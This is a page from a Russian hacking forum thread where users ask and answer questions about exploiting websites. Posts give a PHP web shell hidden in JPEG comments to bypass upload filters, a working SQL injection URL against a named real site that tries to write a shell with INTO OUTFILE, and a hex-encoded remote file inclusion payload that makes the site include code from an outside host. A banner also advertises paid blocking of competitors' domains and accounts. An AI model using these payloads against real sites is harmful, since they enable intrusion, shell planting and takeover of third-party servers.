Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 62 из 2438

Опции темы

Поиск в этой теме

Опции просмотра

#611

04.01.2008, 02:33

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

угу, плюсенг, но их там полно

__________________
Карфаген должен быть разрушен...

#612

04.01.2008, 15:06

sedoy_xxx

Участник форума

Регистрация: 05.07.2006

Сообщений: 285

С нами: 10447586

Репутация: 117

Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации

#613

04.01.2008, 15:27

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Про расширения тут глянь:
https://forum.antichat.ru/threadnav23501-1-10.html

Цитата:

дописать php код в какие-то теги

_)))))) В <?php ?> наверно

Открываешь картинку редактором(по вкусу) и дописываешь в конец...

#614

04.01.2008, 15:51

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.

#615

04.01.2008, 15:56

.Begemot.

Участник форума

Регистрация: 27.03.2007

Сообщений: 161

С нами: 10065986

Репутация: 785

Подобрал -

Код HTML:

http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*

Хочу залить шел -

Код HTML:

http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*

Не получается!

1) В заппосе что то не так или прав на зипись нету?
2) В слепой инжекции можно шел залить?

Последний раз редактировалось trumps; 04.01.2008 в 15:59..

#616

04.01.2008, 16:06

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

С нами: 9976706

Репутация: 1934

Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.

#617

04.01.2008, 16:07

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Cначала в bin2hex попробуй перевести...

#618

04.01.2008, 16:13

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое
2 - можно. Разницы то никакой нет

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#619

04.01.2008, 16:17

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

лол
http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e6 1726f642e72752f616e746963686174/*&id=0&id_=-0.015
в другом параметре запрос с 1 столбцом
из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php
0x687474703a2f2f7a69726f6461792e6e61726f642e72752f 616e746963686174
это переведённое в хекс http://ziroday.narod.ru/antichat
вот и всё =)
ЗЫ В папку forum есть запись

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 04.01.2008 в 16:21..

#620

04.01.2008, 16:33

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

С нами: 10485026

Репутация: 1879

Спудер опередил...
ОФФТОП:
В странице индекс.пхп :

Код:

 if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo("
//   <SCRIPT type='text/javascript'>
//     alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.');
//     window.location='http://www.pornushka.ru';
//   </SCRIPT>
// ");}

Вот это рыбаки!!!

)))))))))))
P.S ничего не дефейсить. Убью.

Страница 62 из 2438

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка

ESCROW ADMIN PANEL